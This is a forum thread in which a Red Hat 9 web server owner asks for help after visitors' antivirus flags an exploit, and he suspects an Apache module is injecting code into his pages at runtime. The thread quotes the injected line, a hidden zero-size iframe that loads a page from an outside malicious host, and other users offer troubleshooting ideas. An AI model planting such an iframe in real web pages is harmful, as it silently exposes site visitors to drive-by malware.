A virus problem.

[enginaar]

Hello,

I've a virus problem on my webserver installed Red Hat 9.

When i want to browse a website which is on the webserver, norton catches and finds HTMLREdir.exploit on adv121.php but there is no adv121.php file on the machine.

As well when i want to browse my site (this happens only browsing the sites that is on my server) browser tries to open another links that are containing malicious scripts.

Please help.

 

[fusionictnl]

Looks like adware on your PC.

Nothing to do with your site. It's not a Virus, so install Ad-Aware or something:

http://www.lavasoftusa.com/software/adaware/

 

[enginaar]

Yeah. I know what are you talking about. I'm not a lamer.

This is a problem on httpd. There is a module that adds the line

"<iframe src="http://www.splitinfinity.info/fa/?d=get" width=0
height=0></iframe>"

in all html pages on run time. That html's doesn't contain any line like above in their codes. There must be a module added to apache to make this changes.

Look at the address below with two different browsers. (Konqueror & IE maybe). You will see that is true.

http://www.cozumteknik.com

I've reinstalled apache but nothing changed, how can i get rid of it.

Anyone help???

 

[hostpc.com]

http://www.spywareinfo.com

 

[nobaloney]

This may indeed not be spyware.

I tried loading http://www.cozumteknik.com into mozilla and had no problem. The source code did NOT show the section beginning with "<iframe". Nothing popped up.

But I also tried it on Konqueror. When I did, the popup did occur on my system.

But the source code still doesn't show the "<iframe" code.

enginaar, When you reinstalled the httpd daemon did you also reinstall httpd.conf?

Did you check for, for example, the cozumteknik.com specific httpd.conf file?

Jeff